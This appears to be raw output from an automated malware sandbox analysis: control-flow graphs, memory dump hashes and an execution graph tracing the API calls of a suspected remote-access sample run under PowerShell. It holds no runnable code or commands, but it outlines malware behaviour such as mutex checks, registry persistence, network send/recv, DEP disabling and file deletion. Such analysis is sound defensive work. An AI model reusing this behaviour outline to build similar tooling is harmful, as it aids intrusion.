1036 76017ba-76017bc 1031->1036 1037 76017be-76017ca 1031->1037 1041 7601458 1034->1041 1042 760145a-7601466 1034->1042 1043 7601482-760148e 1035->1043 1044 7601475-7601478 1035->1044 1046 76017cc-76017ea 1036->1046 1037->1046 1041->1035 1042->1035 1052 7601490-7601492 1043->1052 1053 760149c-76014a3 1043->1053 1044->1043 1049 7601634 1048->1049 1050 7601636-7601638 1048->1050 1049->1047 1050->1047 1052->1053 1061 76014aa-76014ac 1053->1061 1060 7601764-7601766 1058->1060 1059->1060 1060->1024 1062 7601768-7601785 1060->1062 1064 76014c4-760151b 1061->1064 1065 76014ae-76014b4 1061->1065 1070 7601787-7601799 1062->1070 1071 76017ed-76017f2 1062->1071 1066 76014b6 1065->1066 1067 76014b8-76014ba 1065->1067 1066->1064 1067->1064 1070->1024 1071->1070
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7600000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: feb19c4d98a6ef9b2db90c6401d805a3a9c8c47e86905972bce8eb50335f7d20
                                                                                                            • Instruction ID: 3dd42fdf92b5d851db40bad284055ba8e1ebb1327d59505437f7b7fd8b81e0df
                                                                                                            • Opcode Fuzzy Hash: feb19c4d98a6ef9b2db90c6401d805a3a9c8c47e86905972bce8eb50335f7d20
                                                                                                            • Instruction Fuzzy Hash: E8B1D7B570420A9BDB2E4F79981066FBBA6AB83711F18807BD5078B3D1DA31C945C7E1

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1073 76000f0-7600115 1074 760011b-7600120 1073->1074 1075 760028d-76002d3 1073->1075 1076 7600122-7600128 1074->1076 1077 7600138-7600144 1074->1077 1081 76002d9-76002de 1075->1081 1082 760042a-7600430 1075->1082 1078 760012a 1076->1078 1079 760012c-7600136 1076->1079 1087 760023a-7600244 1077->1087 1088 760014a-760014d 1077->1088 1078->1077 1079->1077 1085 76002e0-76002e6 1081->1085 1086 76002f6-76002fa 1081->1086 1097 7600432-7600434 call 7600439 1082->1097 1098 7600469-760047c 1082->1098 1090 76002e8 1085->1090 1091 76002ea-76002f4 1085->1091 1095 7600300-7600302 1086->1095 1096 76003d7-76003e1 1086->1096 1092 7600252-7600258 1087->1092 1093 7600246-760024f 1087->1093 1088->1087 1094 7600153-760015a 1088->1094 1090->1086 1091->1086 1101 760025a-760025c 1092->1101 1102 760025e-760026a 1092->1102 1094->1075 1103 7600160-7600165 1094->1103 1104 7600312 1095->1104 1105 7600304-7600310 1095->1105 1099 76003e3-76003ec 1096->1099 1100 76003ef-76003f5 1096->1100 1097->1098 1117 7600482-7600488 1098->1117 1118 760050d-7600512 1098->1118 1109 76003f7-76003f9 1100->1109 1110 76003fb-7600407 1100->1110 1112 760026c-760028a 1101->1112 1102->1112 1113 7600167-760016d 1103->1113 1114 760017d-7600181 1103->1114 1106 7600314-7600316 1104->1106 1105->1106 1106->1096 1115 760031c-7600320 1106->1115 1119 7600409-7600427 1109->1119 1110->1119 1121 7600171-760017b 1113->1121 1122 760016f 1113->1122 1114->1087 1116 7600187-7600189 1114->1116 1124 7600340 1115->1124 1125 7600322-760033e 1115->1125 1126 7600199 1116->1126 1127 760018b-7600197 1116->1127 1128 760048a 1117->1128 1129 760048c-7600498 1117->1129 1118->1117 1121->1114 1122->1114 1133 7600342-7600344 1124->1133 1125->1133 1132 760019b-760019d 1126->1132 1127->1132 1134 760049a-76004c8 1128->1134 1129->1134 1132->1087 1139 76001a3-76001a5 1132->1139 1133->1096 1140 760034a-760035d 1133->1140 1156 76004d1-76004d7 1134->1156 1157 76004ca-76004ce 1134->1157 1142 76001a7-76001ad 1139->1142 1143 76001bf-76001c8 1139->1143 1155 7600363-7600365 1140->1155 1147 76001b1-76001bd 1142->1147 1148 76001af 1142->1148 1152 76001e0-7600237 1143->1152 1153 76001ca-76001d0 1143->1153 1147->1143 1148->1143 1158 76001d2 1153->1158 1159 76001d4-76001d6 1153->1159 1163 7600367-760036d 1155->1163 1164 760037d-76003d4 1155->1164 1160 76004d9-76004db 1156->1160 1161 76004dd-76004e9 1156->1161 1158->1152 1159->1152 1166 76004eb-760050a 1160->1166 1161->1166 1167 7600371-7600373 1163->1167 1168 760036f 1163->1168 1167->1164 1168->1164
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7600000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e583634d0f2af5249c8d075c5f489d37ad51e315b27a6a3c3a8445c1c51ff499
                                                                                                            • Instruction ID: 13c2978589d53fb7a73a5d5af3ba6c329ef6b6d232d043f6953dbe6e1e1d9490
                                                                                                            • Opcode Fuzzy Hash: e583634d0f2af5249c8d075c5f489d37ad51e315b27a6a3c3a8445c1c51ff499
                                                                                                            • Instruction Fuzzy Hash: C5A1B2B1B04206DFDB2D9FB9D4507ABB7A2AF89210F14807AD5468B381EB71C946C7D1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7600000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c92d0e677777fe941a93d65711025958801772f09aabcc4bd1ebdc23eb58c616
                                                                                                            • Instruction ID: 6306a2642a695df0dbf21584ed8ddd3ae9bca4a7ee843afc47fd9a0966a433c3
                                                                                                            • Opcode Fuzzy Hash: c92d0e677777fe941a93d65711025958801772f09aabcc4bd1ebdc23eb58c616
                                                                                                            • Instruction Fuzzy Hash: 584104B171420B9FDB2C4A7598203BBB391AB91214F24807AD517CB7D2EF76C951C7E2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7600000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: abf6bf98b3902852af9a5fe9282fa802325d611c74366045124720f3aab1b88a
                                                                                                            • Instruction ID: 5a94d71518a661188c4860e25432798b07667bc4e0dac12e3c4b8ab61c4f1ab6
                                                                                                            • Opcode Fuzzy Hash: abf6bf98b3902852af9a5fe9282fa802325d611c74366045124720f3aab1b88a
                                                                                                            • Instruction Fuzzy Hash: 1631A6B160434EDFCB2E8F28C54166B7BA1EF43710F1941A6D8168B2E2E735C94AC7D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2467170742.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_7600000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ca0914f0c64aed4d80f405585b07a48749e2c79ea7d85334ac3845f76fb84f4b
                                                                                                            • Instruction ID: cd2d39b72e63cc26d2db43441cf15eb43b627b35947f0fe83149fdb4373182db
                                                                                                            • Opcode Fuzzy Hash: ca0914f0c64aed4d80f405585b07a48749e2c79ea7d85334ac3845f76fb84f4b
                                                                                                            • Instruction Fuzzy Hash: 1C31B1B0A0430A8FCB1D8F35C498AAABBE1BF86310F088166D54A8B291D770C985CBD1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432068834.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2dcd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: b5daa5e84c411ec945e9e95d14ce51f659b163e49a3fcb96b735727b9a9b9d6d
                                                                                                            • Instruction ID: c13879094ce8e2d19bf28b9ec952597ba4680ebb5e8e0b6c6f36b142e299ce21
                                                                                                            • Opcode Fuzzy Hash: b5daa5e84c411ec945e9e95d14ce51f659b163e49a3fcb96b735727b9a9b9d6d
                                                                                                            • Instruction Fuzzy Hash: 0701DF31405305AAE7208A29CD80B66BF98EB81334F38852EED480B242C3789846DAB1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000008.00000002.2432068834.0000000002DCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DCD000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_8_2_2dcd000_powershell.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 21231217f3c4aa210663d47e106fca1b43b53dedb74ef035ce0fd8842965a2d0
                                                                                                            • Instruction ID: 1fd734c413851cb944dc7ae647405df4cce57628cf73662bbbc9c4307e4886f0
                                                                                                            • Opcode Fuzzy Hash: 21231217f3c4aa210663d47e106fca1b43b53dedb74ef035ce0fd8842965a2d0
                                                                                                            • Instruction Fuzzy Hash: 5B01526100E3C05FE7128B258C94B56BFB4EF43224F2D81DBD9888F2A3C3695849C772

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:3.1%
                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                            Signature Coverage:5.6%
                                                                                                            Total number of Nodes:1062
                                                                                                            Total number of Limit Nodes:55
                                                                                                            execution_graph 46199 41d4e0 46200 41d4f6 ctype ___scrt_fastfail 46199->46200 46201 41d6f3 46200->46201 46220 431fa9 21 API calls _Yarn 46200->46220 46205 41d744 46201->46205 46215 41d081 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46201->46215 46204 41d704 46204->46205 46206 41d770 46204->46206 46216 431fa9 21 API calls _Yarn 46204->46216 46206->46205 46223 41d484 21 API calls ___scrt_fastfail 46206->46223 46208 41d6a6 ___scrt_fastfail 46208->46205 46221 431fa9 21 API calls _Yarn 46208->46221 46211 41d73d ___scrt_fastfail 46211->46205 46217 43265f 46211->46217 46213 41d6ce ___scrt_fastfail 46213->46205 46222 431fa9 21 API calls _Yarn 46213->46222 46215->46204 46216->46211 46224 43257f 46217->46224 46219 432667 46219->46206 46220->46208 46221->46213 46222->46201 46223->46205 46225 43258e 46224->46225 46226 432598 46224->46226 46225->46219 46226->46225 46230 431fa9 21 API calls _Yarn 46226->46230 46228 4325b9 46228->46225 46231 43294a CryptAcquireContextA 46228->46231 46230->46228 46232 43296b CryptGenRandom 46231->46232 46234 432966 46231->46234 46233 432980 CryptReleaseContext 46232->46233 46232->46234 46233->46234 46234->46225 46235 426040 46240 426107 recv 46235->46240 46241 44e8c6 46242 44e8d1 46241->46242 46243 44e8f9 46242->46243 46244 44e8ea 46242->46244 46247 44e908 46243->46247 46263 455583 27 API calls 2 library calls 46243->46263 46262 445364 20 API calls __dosmaperr 46244->46262 46250 44b9ce 46247->46250 46249 44e8ef ___scrt_fastfail 46251 44b9e6 46250->46251 46252 44b9db 46250->46252 46254 44b9ee 46251->46254 46261 44b9f7 _strftime 46251->46261 46264 446b0f 46252->46264 46271 446ad5 20 API calls __dosmaperr 46254->46271 46256 44ba21 HeapReAlloc 46258 44b9e3 46256->46258 46256->46261 46257 44b9fc 46272 445364 20 API calls __dosmaperr 46257->46272 46258->46249 46261->46256 46261->46257 46273 442210 7 API calls 2 library calls 46261->46273 46262->46249 46263->46247 46265 446b4d 46264->46265 46270 446b1d _strftime 46264->46270 46275 445364 20 API calls __dosmaperr 46265->46275 46266 446b38 RtlAllocateHeap 46268 446b4b 46266->46268 46266->46270 46268->46258 46270->46265 46270->46266 46274 442210 7 API calls 2 library calls 46270->46274 46271->46258 46272->46258 46273->46261 46274->46270 46275->46268 46276 4260a1 46281 42611e send 46276->46281 46282 442a0c 46283 442a15 46282->46283 46284 442a2e 46282->46284 46285 442a1d 46283->46285 46289 442a94 46283->46289 46287 442a25 46287->46285 46300 442d61 22 API calls 2 library calls 46287->46300 46290 442aa0 46289->46290 46291 442a9d 46289->46291 46301 44e1ce GetEnvironmentStringsW 46290->46301 46291->46287 46294 442aad 46310 446ad5 20 API calls __dosmaperr 46294->46310 46297 442ae2 46297->46287 46299 442ab8 46309 446ad5 20 API calls __dosmaperr 46299->46309 46300->46284 46302 44e1e2 46301->46302 46303 442aa7 46301->46303 46304 446b0f _strftime 21 API calls 46302->46304 46303->46294 46308 442bb9 26 API calls 4 library calls 46303->46308 46305 44e1f6 ctype 46304->46305 46311 446ad5 20 API calls __dosmaperr 46305->46311 46307 44e210 FreeEnvironmentStringsW 46307->46303 46308->46299 46309->46294 46310->46297 46311->46307 46312 43a9a8 46314 43a9b4 _swprintf __FrameHandler3::FrameUnwindToState 46312->46314 46313 43a9c2 46330 445364 20 API calls __dosmaperr 46313->46330 46314->46313 46317 43a9ec 46314->46317 46316 43a9c7 46331 43a837 26 API calls _Deallocate 46316->46331 46325 444adc EnterCriticalSection 46317->46325 46320 43a9f7 46326 43aa98 46320->46326 46322 43a9d2 __fread_nolock 46325->46320 46328 43aaa6 46326->46328 46327 43aa02 46332 43aa1f LeaveCriticalSection std::_Lockit::~_Lockit 46327->46332 46328->46327 46333 448426 39 API calls 2 library calls 46328->46333 46330->46316 46331->46322 46332->46322 46333->46328 46334 402bcc 46335 402bd7 46334->46335 46336 402bdf 46334->46336 46352 403315 28 API calls _Deallocate 46335->46352 46338 402beb 46336->46338 46342 4015d3 46336->46342 46339 402bdd 46344 43361d 46342->46344 46345 402be9 46344->46345 46348 43363e std::_Facet_Register 46344->46348 46353 43a89c 46344->46353 46360 442210 7 API calls 2 library calls 46344->46360 46347 433dfc std::_Facet_Register 46362 437be7 RaiseException 46347->46362 46348->46347 46361 437be7 RaiseException 46348->46361 46350 433e19 46352->46339 46357 446b0f _strftime 46353->46357 46354 446b4d 46364 445364 20 API calls __dosmaperr 46354->46364 46355 446b38 RtlAllocateHeap 46355->46357 46358 446b4b 46355->46358 46357->46354 46357->46355 46363 442210 7 API calls 2 library calls 46357->46363 46358->46344 46360->46344 46361->46347 46362->46350 46363->46357 46364->46358 46365 4339ce 46366 4339da __FrameHandler3::FrameUnwindToState 46365->46366 46397 4336c3 46366->46397 46368 4339e1 46369 433b34 46368->46369 46372 433a0b 46368->46372 46697 433b54 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46369->46697 46371 433b3b 46698 4426ce 28 API calls _Atexit 46371->46698 46382 433a4a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46372->46382 46691 4434e1 5 API calls _ValidateLocalCookies 46372->46691 46374 433b41 46699 442680 28 API calls _Atexit 46374->46699 46377 433a24 46379 433a2a 46377->46379 46692 443485 5 API calls _ValidateLocalCookies 46377->46692 46378 433b49 46381 433aab 46408 433c6e 46381->46408 46382->46381 46693 43ee04 38 API calls 3 library calls 46382->46693 46391 433acd 46391->46371 46392 433ad1 46391->46392 46393 433ada 46392->46393 46695 442671 28 API calls _Atexit 46392->46695 46696 433852 13 API calls 2 library calls 46393->46696 46396 433ae2 46396->46379 46398 4336cc 46397->46398 46700 433e1a IsProcessorFeaturePresent 46398->46700 46400 4336d8 46701 4379fe 10 API calls 3 library calls 46400->46701 46402 4336dd 46407 4336e1 46402->46407 46702 44336e 46402->46702 46404 4336f8 46404->46368 46407->46368 46764 436060 46408->46764 46411 433ab1 46412 443432 46411->46412 46766 44ddd9 46412->46766 46414 433aba 46417 40d767 46414->46417 46415 44343b 46415->46414 46770 44e0e3 38 API calls 46415->46770 46772 41bcf3 LoadLibraryA GetProcAddress 46417->46772 46419 40d783 GetModuleFileNameW 46777 40e168 46419->46777 46421 40d79f 46792 401fbd 46421->46792 46424 401fbd 28 API calls 46425 40d7bd 46424->46425 46796 41afd3 46425->46796 46429 40d7cf 46821 401d8c 46429->46821 46431 40d7d8 46432 40d835 46431->46432 46433 40d7eb 46431->46433 46827 401d64 46432->46827 47078 40e986 111 API calls 46433->47078 46436 40d845 46439 401d64 28 API calls 46436->46439 46437 40d7fd 46438 401d64 28 API calls 46437->46438 46442 40d809 46438->46442 46440 40d864 46439->46440 46832 404cbf 46440->46832 47079 40e937 68 API calls 46442->47079 46443 40d873 46836 405ce6 46443->46836 46446 40d87f 46839 401eef 46446->46839 46447 40d824 47080 40e155 68 API calls 46447->47080 46450 40d88b 46843 401eea 46450->46843 46451 40d82d 46454 401eea 26 API calls 46451->46454 46453 40d894 46456 401eea 26 API calls 46453->46456 46455 40dc9f 46454->46455 46694 433ca4 GetModuleHandleW 46455->46694 46457 40d89d 46456->46457 46458 401d64 28 API calls 46457->46458 46459 40d8a6 46458->46459 46847 401ebd 46459->46847 46461 40d8b1 46462 401d64 28 API calls 46461->46462 46463 40d8ca 46462->46463 46464 401d64 28 API calls 46463->46464 46466 40d8e5 46464->46466 46465 40d946 46467 401d64 28 API calls 46465->46467 46482 40e134 46465->46482 46466->46465 47081 4085b4 46466->47081 46474 40d95d 46467->46474 46469 40d912 46470 401eef 26 API calls 46469->46470 46471 40d91e 46470->46471 46472 401eea 26 API calls 46471->46472 46475 40d927 46472->46475 46473 40d9a4 46851 40bed7 46473->46851 46474->46473 46478 4124b7 3 API calls 46474->46478 47085 4124b7 RegOpenKeyExA 46475->47085 46477 40d9aa 46477->46451 46854 41a473 46477->46854 46483 40d988 46478->46483 46481 40d9c5 46484 40da18 46481->46484 46871 40697b 46481->46871 47161 412902 30 API calls 46482->47161 46483->46473 47088 412902 30 API calls 46483->47088 46486 401d64 28 API calls 46484->46486 46489 40da21 46486->46489 46498 40da32 46489->46498 46499 40da2d 46489->46499 46491 40e14a 47162 4112b5 64 API calls ___scrt_fastfail 46491->47162 46492 40d9e4 47089 40699d 30 API calls 46492->47089 46493 40d9ee 46497 401d64 28 API calls 46493->46497 46506 40d9f7 46497->46506 46503 401d64 28 API calls 46498->46503 47092 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46499->47092 46500 40d9e9 47090 4064d0 97 API calls 46500->47090 46504 40da3b 46503->46504 46875 41ae18 46504->46875 46506->46484 46509 40da13 46506->46509 46507 40da46 46879 401e18 46507->46879 47091 4064d0 97 API calls 46509->47091 46510 40da51 46883 401e13 46510->46883 46513 40da5a 46514 401d64 28 API calls 46513->46514 46515 40da63 46514->46515 46516 401d64 28 API calls 46515->46516 46517 40da7d 46516->46517 46518 401d64 28 API calls 46517->46518 46519 40da97 46518->46519 46520 401d64 28 API calls 46519->46520 46522 40dab0 46520->46522 46521 40db1d 46524 40db2c 46521->46524 46530 40dcaa ___scrt_fastfail 46521->46530 46522->46521 46523 401d64 28 API calls 46522->46523 46528 40dac5 _wcslen 46523->46528 46525 40db35 46524->46525 46552 40dbb1 ___scrt_fastfail 46524->46552 46526 401d64 28 API calls 46525->46526 46527 40db3e 46526->46527 46529 401d64 28 API calls 46527->46529 46528->46521 46532 401d64 28 API calls 46528->46532 46531 40db50 46529->46531 47152 41265d RegOpenKeyExA RegQueryValueExA RegCloseKey 46530->47152 46535 401d64 28 API calls 46531->46535 46533 40dae0 46532->46533 46536 401d64 28 API calls 46533->46536 46537 40db62 46535->46537 46538 40daf5 46536->46538 46540 401d64 28 API calls 46537->46540 47093 40c89e 46538->47093 46539 40dcef 46541 401d64 28 API calls 46539->46541 46544 40db8b 46540->46544 46542 40dd16 46541->46542 46897 401f66 46542->46897 46549 401d64 28 API calls 46544->46549 46546 401e18 26 API calls 46548 40db14 46546->46548 46553 401e13 26 API calls 46548->46553 46550 40db9c 46549->46550 47150 40bc67 45 API calls _wcslen 46550->47150 46551 40dd25 46901 4126d2 RegCreateKeyA 46551->46901 46887 4128a2 46552->46887 46553->46521 46557 40dbac 46557->46552 46559 40dc45 ctype 46562 401d64 28 API calls 46559->46562 46560 401d64 28 API calls 46561 40dd47 46560->46561 46907 43a5f7 46561->46907 46563 40dc5c 46562->46563 46563->46539 46566 40dc70 46563->46566 46569 401d64 28 API calls 46566->46569 46567 40dd5e 47153 41bec0 86 API calls ___scrt_fastfail 46567->47153 46568 40dd81 46573 401f66 28 API calls 46568->46573 46571 40dc7e 46569->46571 46574 41ae18 28 API calls 46571->46574 46572 40dd65 CreateThread 46572->46568 47551 41c97f 10 API calls 46572->47551 46575 40dd96 46573->46575 46576 40dc87 46574->46576 46577 401f66 28 API calls 46575->46577 47151 40e219 109 API calls 46576->47151 46579 40dda5 46577->46579 46911 41a696 46579->46911 46580 40dc8c 46580->46539 46582 40dc93 46580->46582 46582->46451 46584 401d64 28 API calls 46585 40ddb6 46584->46585 46586 401d64 28 API calls 46585->46586 46587 40ddcb 46586->46587 46588 401d64 28 API calls 46587->46588 46589 40ddeb 46588->46589 46590 43a5f7 _strftime 42 API calls 46589->46590 46591 40ddf8 46590->46591 46592 401d64 28 API calls 46591->46592 46593 40de03 46592->46593 46594 401d64 28 API calls 46593->46594 46595 40de14 46594->46595 46596 401d64 28 API calls 46595->46596 46597 40de29 46596->46597 46598 401d64 28 API calls 46597->46598 46599 40de3a 46598->46599 46600 40de41 StrToIntA 46599->46600 46935 409517 46600->46935 46603 401d64 28 API calls 46604 40de5c 46603->46604 46605 40dea1 46604->46605 46606 40de68 46604->46606 46609 401d64 28 API calls 46605->46609 47154 43361d 22 API calls 3 library calls 46606->47154 46608 40de71 46610 401d64 28 API calls 46608->46610 46611 40deb1 46609->46611 46612 40de84 46610->46612 46614 40def9 46611->46614 46615 40debd 46611->46615 46613 40de8b CreateThread 46612->46613 46613->46605 47549 419138 102 API calls 2 library calls 46613->47549 46616 401d64 28 API calls 46614->46616 47155 43361d 22 API calls 3 library calls 46615->47155 46619 40df02 46616->46619 46618 40dec6 46620 401d64 28 API calls 46618->46620 46622 40df6c 46619->46622 46623 40df0e 46619->46623 46621 40ded8 46620->46621 46624 40dedf CreateThread 46621->46624 46625 401d64 28 API calls 46622->46625 46626 401d64 28 API calls 46623->46626 46624->46614 47548 419138 102 API calls 2 library calls 46624->47548 46627 40df75 46625->46627 46628 40df1e 46626->46628 46629 40df81 46627->46629 46630 40dfba 46627->46630 46631 401d64 28 API calls 46628->46631 46634 401d64 28 API calls 46629->46634 46960 41a7b2 GetComputerNameExW GetUserNameW 46630->46960 46632 40df33 46631->46632 47156 40c854 31 API calls 46632->47156 46635 40df8a 46634->46635 46640 401d64 28 API calls 46635->46640 46637 401e18 26 API calls 46639 40dfce 46637->46639 46642 401e13 26 API calls 46639->46642 46644 40df9f 46640->46644 46641 40df46 46645 401e18 26 API calls 46641->46645 46643 40dfd7 46642->46643 46646 40dfe0 SetProcessDEPPolicy 46643->46646 46647 40dfe3 CreateThread 46643->46647 46654 43a5f7 _strftime 42 API calls 46644->46654 46648 40df52 46645->46648 46646->46647 46649 40e004 46647->46649 46650 40dff8 CreateThread 46647->46650 47521 40e54f 46647->47521 46651 401e13 26 API calls 46648->46651 46652 40e019 46649->46652 46653 40e00d CreateThread 46649->46653 46650->46649 47550 410f36 136 API calls 46650->47550 46655 40df5b CreateThread 46651->46655 46657 40e073 46652->46657 46659 401f66 28 API calls 46652->46659 46653->46652 47552 411524 38 API calls ___scrt_fastfail 46653->47552 46656 40dfac 46654->46656 46655->46622 47553 40196b 49 API calls _strftime 46655->47553 47157 40b95c 7 API calls 46656->47157 46971 41246e RegOpenKeyExA 46657->46971 46660 40e046 46659->46660 47158 404c9e 28 API calls 46660->47158 46664 40e053 46666 401f66 28 API calls 46664->46666 46665 40e12a 46983 40cbac 46665->46983 46667 40e062 46666->46667 46670 41a696 79 API calls 46667->46670 46669 41ae18 28 API calls 46672 40e0a4 46669->46672 46673 40e067 46670->46673 46974 412584 RegOpenKeyExW 46672->46974 46675 401eea 26 API calls 46673->46675 46675->46657 46678 401e13 26 API calls 46681 40e0c5 46678->46681 46679 40e0ed DeleteFileW 46680 40e0f4 46679->46680 46679->46681 46683 41ae18 28 API calls 46680->46683 46681->46679 46681->46680 46682 40e0db Sleep 46681->46682 47159 401e07 46682->47159 46685 40e104 46683->46685 46979 41297a RegOpenKeyExW 46685->46979 46687 40e117 46688 401e13 26 API calls 46687->46688 46689 40e121 46688->46689 46690 401e13 26 API calls 46689->46690 46690->46665 46691->46377 46692->46382 46693->46381 46694->46391 46695->46393 46696->46396 46697->46371 46698->46374 46699->46378 46700->46400 46701->46402 46706 44e959 46702->46706 46705 437a27 8 API calls 3 library calls 46705->46407 46709 44e976 46706->46709 46710 44e972 46706->46710 46708 4336ea 46708->46404 46708->46705 46709->46710 46712 4489bd 46709->46712 46724 433d3c 5 API calls ___raise_securityfailure 46710->46724 46713 4489c9 __FrameHandler3::FrameUnwindToState 46712->46713 46725 444adc EnterCriticalSection 46713->46725 46715 4489d0 46726 44ef74 46715->46726 46717 4489df 46718 4489ee 46717->46718 46739 448851 29 API calls 46717->46739 46741 448a0a LeaveCriticalSection std::_Lockit::~_Lockit 46718->46741 46721 4489e9 46740 448907 GetStdHandle GetFileType 46721->46740 46722 4489ff __fread_nolock 46722->46709 46724->46708 46725->46715 46727 44ef80 __FrameHandler3::FrameUnwindToState 46726->46727 46728 44efa4 46727->46728 46729 44ef8d 46727->46729 46742 444adc EnterCriticalSection 46728->46742 46750 445364 20 API calls __dosmaperr 46729->46750 46732 44efb0 46738 44efdc 46732->46738 46743 44eec5 46732->46743 46733 44ef92 46751 43a837 26 API calls _Deallocate 46733->46751 46735 44ef9c __fread_nolock 46735->46717 46752 44f003 LeaveCriticalSection std::_Lockit::~_Lockit 46738->46752 46739->46721 46740->46718 46741->46722 46742->46732 46753 448716 46743->46753 46745 44eed7 46749 44eee4 46745->46749 46760 44773e 11 API calls 2 library calls 46745->46760 46748 44ef36 46748->46732 46761 446ad5 20 API calls __dosmaperr 46749->46761 46750->46733 46751->46735 46752->46735 46758 448723 _strftime 46753->46758 46754 448763 46763 445364 20 API calls __dosmaperr 46754->46763 46755 44874e RtlAllocateHeap 46757 448761 46755->46757 46755->46758 46757->46745 46758->46754 46758->46755 46762 442210 7 API calls 2 library calls 46758->46762 46760->46745 46761->46748 46762->46758 46763->46757 46765 433c81 GetStartupInfoW 46764->46765 46765->46411 46767 44ddeb 46766->46767 46768 44dde2 46766->46768 46767->46415 46771 44dcd8 51 API calls 5 library calls 46768->46771 46770->46415 46771->46767 46773 41bd32 LoadLibraryA GetProcAddress 46772->46773 46774 41bd22 GetModuleHandleA GetProcAddress 46772->46774 46775 41bd5b 32 API calls 46773->46775 46776 41bd4b LoadLibraryA GetProcAddress 46773->46776 46774->46773 46775->46419 46776->46775 47163 41a64f FindResourceA 46777->47163 46780 43a89c _Yarn 21 API calls 46781 40e192 ctype 46780->46781 47166 401f86 46781->47166 46784 401eef 26 API calls 46785 40e1b8 46784->46785 46786 401eea 26 API calls 46785->46786 46787 40e1c1 46786->46787 46788 43a89c _Yarn 21 API calls 46787->46788 46789 40e1d2 ctype 46788->46789 47170 406052 46789->47170 46791 40e205 46791->46421 46793 401fcc 46792->46793 47178 402501 46793->47178 46795 401fea 46795->46424 46816 41afe6 46796->46816 46797 41b056 46798 401eea 26 API calls 46797->46798 46799 41b088 46798->46799 46801 401eea 26 API calls 46799->46801 46800 41b058 47185 403b60 28 API calls 46800->47185 46804 41b090 46801->46804 46806 401eea 26 API calls 46804->46806 46805 41b064 46808 401eef 26 API calls 46805->46808 46807 40d7c6 46806->46807 46817 40e8bd 46807->46817 46810 41b06d 46808->46810 46809 401eef 26 API calls 46809->46816 46811 401eea 26 API calls 46810->46811 46813 41b075 46811->46813 46812 401eea 26 API calls 46812->46816 47186 41bfb9 28 API calls 46813->47186 46816->46797 46816->46800 46816->46809 46816->46812 47183 403b60 28 API calls 46816->47183 47184 41bfb9 28 API calls 46816->47184 46818 40e8ca 46817->46818 46820 40e8da 46818->46820 47187 40200a 26 API calls 46818->47187 46820->46429 46822 40200a 46821->46822 46826 40203a 46822->46826 47188 402654 26 API calls 46822->47188 46824 40202b 47189 4026ba 26 API calls _Deallocate 46824->47189 46826->46431 46828 401d6c 46827->46828 46829 401d74 46828->46829 47190 401fff 28 API calls 46828->47190 46829->46436 46833 404ccb 46832->46833 47191 402e78 46833->47191 46835 404cee 46835->46443 47200 404bc4 46836->47200 46838 405cf4 46838->46446 46840 401efe 46839->46840 46842 401f0a 46840->46842 47209 4021b9 26 API calls 46840->47209 46842->46450 46844 4021b9 46843->46844 46845 4021e8 46844->46845 47210 40262e 26 API calls _Deallocate 46844->47210 46845->46453 46848 401ec9 46847->46848 46849 401ee4 46848->46849 46850 402325 28 API calls 46848->46850 46849->46461 46850->46849 47211 401e8f 46851->47211 46853 40bee1 CreateMutexA GetLastError 46853->46477 47213 41b16b 46854->47213 46859 401eef 26 API calls 46860 41a4af 46859->46860 46861 401eea 26 API calls 46860->46861 46862 41a4b7 46861->46862 46863 41a50a 46862->46863 46864 412513 31 API calls 46862->46864 46863->46481 46865 41a4dd 46864->46865 